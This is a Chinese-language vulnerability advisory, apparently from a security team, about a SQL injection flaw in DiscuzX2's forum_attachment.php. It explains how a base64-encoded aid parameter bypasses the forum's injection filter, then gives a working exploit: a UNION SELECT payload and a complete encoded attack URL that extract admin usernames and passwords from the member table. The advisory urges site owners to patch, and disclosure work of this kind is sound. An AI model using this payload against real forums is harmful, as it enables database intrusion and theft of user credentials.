最近DiscuzX2被爆出两个0day，一个是SQL注入漏洞,另一个是XSS注入漏洞。这两个漏洞危害等级都较高，Nevel安全团队提醒广大站长进行及时更新自己的网站，或安装最新官方补丁。

SQL注入问题描述:

SQL是一种数据库攻击方式，攻击者利用畸形的客户端输入，如果过滤不够，程序就会执行过多的数据库命令，从而会引发数据泄漏，服务器被入侵等一系列问题;危害等级高。

分析报告:

问题的具体原因发生在source/module/forum/forum_attachment.php,代码如下图:

其中$_G[‘gp_aid’]是由用户提交的变量aid所产生，而程序是将aid经过base64_decode后再传入SQL查询，在传入给SQL查询之前也没有作任何判断;但这正好给攻击者提供base64加密绕过Discuz自身的SQL攻击检测程序,从而产生SQL注入漏洞。

构造Sql_Exploit:

mod=attachment //包含漏洞文件

findpost=imiyoo //保证$_G[‘gp_findpost’]不为空，使程序进入恶意SQL查询流程

aid=base64_encode(“1' and 1=2 union all select 1,concat(username,0x7C,password) from pre_common_member where username like 'admin|Nevel|Nevel|Nevel|Nevel”) //构造SQL利用语句爆出用户名和密码，其中后面有4个’|’用来产生5个变量

从而完整的攻击语句如下:

https://target/forum.php?mod=attachment&findpost=imiyoo&aid=

MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsY29uY2F0KHVzZXJuYW1lLDB4N0MscGFzc3dvcmQpIGZyb20gcHJlX2NvbW1vbl9tZW1iZXIgd2hlcmUgIHVzZXJuYW1lIGxpa2UgJ2FkbWlufE5ldmVsfE5ldmVsfE5ldmVsfE5ldmVs

攻击效果如下图: